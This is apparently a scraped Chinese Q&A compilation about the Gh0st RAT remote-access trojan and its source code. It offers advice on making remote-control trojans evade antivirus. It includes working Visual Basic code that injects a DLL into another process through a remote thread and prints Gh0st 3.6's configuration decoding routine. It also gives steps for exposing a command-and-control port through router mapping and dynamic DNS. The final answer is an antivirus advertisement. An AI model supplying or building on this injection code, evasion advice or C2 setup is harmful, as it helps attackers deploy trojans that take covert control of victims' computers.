gh0strat源码(gh0st源码下载)
本文目录一览:
- 1、想做免杀远控,通过修改现有的公开源码好实现吗?
- 2、Gh0st3.6 源码中怎么实现进程注入的?
- 3、有没有类似GH0ST远控的源码,DELPHI的源码?
- 4、gh0st远控怎么样
- 5、gh0st rat 3.75
- 6、木马后门:Gh0st RAT远程控制问题
想做免杀远控,通过修改现有的公开源码好实现吗?
你说的不错
现在免杀确实不好做了
源码免杀不错的,现在开源的远控也有,个人觉得开源的gh0st不错,你可以尝试下gh0st是C写的,看你的编程的底子了,我这还有编译免杀的教程,要的话M我。
还有鸽子1.2的开源,delphi写的,还有暗组的DRAT开源1.X的,还有其他的等等
要么你自己写一款也行,你要有技术的哦
Gh0st3.6 源码中怎么实现进程注入的?
我写过一个注入Dll的VB代码,两个参数,第一个是要注入的进程的PID,第二个是要注入的Dll的路径。代码如下(不加函数声明……)Public Function FxRemoteProcessInsertDll(ByVal pid As Long, ByVal DllPath As String) As Long
Dim lpThreadAttributes As SECURITY_ATTRIBUTES
Dim hProcess, hThread As Long
Dim DllBuffer As Long
Dim DllFileSize As Long
Dim rReturn As Long
Dim fAddr As Long
Dim errNum As Long
Dim errStr As String
hProcess = FxNormalOpenProcess(PROCESS_ALL_ACCESS, pid)
'所需权限PROCESS_QUERY_INFORMATION Or PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE
If hProcess = 0 Then errStr = "打开进程失败!": GoTo errors DllFileSize = LenB(StrConv(DllPath, vbFromUnicode)) + 1
DllBuffer = VirtualAllocEx(hProcess, 0, DllFileSize, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
If DllBuffer = 0 Then errStr = "分配内存空间失败!": GoTo errors rReturn = WriteProcessLongMemory(hProcess, DllBuffer, ByVal DllPath, DllFileSize, 0)
If DllBuffer = 0 Then errStr = "写入内存失败!": GoTo errors
fAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA")
hThread = CreateRemoteThread(hProcess, lpThreadAttributes, 0, fAddr, DllBuffer, 0, ByVal 0)
If DllBuffer = 0 Then errStr = "加载Dll失败!": GoTo errors
WaitForSingleObject hThread, INFINITE
'——输出调试信息——
errNum = GetLastError
Debug.Print "DllFileSize:" DllFileSize ",DllBuffer:" FormatHex(DllBuffer) ",hThread:" hThread ",errNum:" errNum
'——————————
VirtualFreeEx hProcess, DllBuffer, DllFileSize, MEM_DECOMMIT
ZwClose hProcess
ZwClose hThread
FxRemoteProcessInsertDll = 1
Exit Function
errors:
MsgBox errStr, 0, "错误"
FxRemoteProcessInsertDll = 0
End Function
有没有类似GH0ST远控的源码,DELPHI的源码?
可以自己写,服务端截屏传回来,客户端,也就是控制端换算出鼠标位置,发送鼠标命令及键盘按键给服务端,服务端执行,要开端口,关键是怎么种服务端。
实现很简单,效率看算法。
gh0st远控怎么样
在base64的基础上又作了一个加密,下面是gh0st V3.6的源码中的:
char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, data);
for (i = 0; i len; i++)
{
data[i] -= 0x86;
data[i] ^= 0x19;
}
return data;
}
你是要解释程序,还是仅仅是想要一个配置结果?
如果是要结果,请贴出你的源码的类似上面的代码,版本不同,可能编解码不太相同。
base64的算法请自行查找,网上也有编译好的编解码程序。.net/java等都支持base64编解码。
gh0st rat 3.75
你自己把端口改成8000然后用路由器映射那把你内网IP映射上8000 再申请个花生壳。,下载客户端
登陆就。, 在连接测试那里用域名就OK了! 给最佳。
木马后门:Gh0st RAT远程控制问题
对于这种情况,你可以试试使用金山毒霸2011云杀毒软件彻底查杀下。金山毒霸杀毒是挺厉害的,要下载的话在百度搜索下金山毒霸2011,看到第一个就是最新免费下载的地址,就可以下载安装,金山毒霸2011查杀病毒是完全能查杀干净的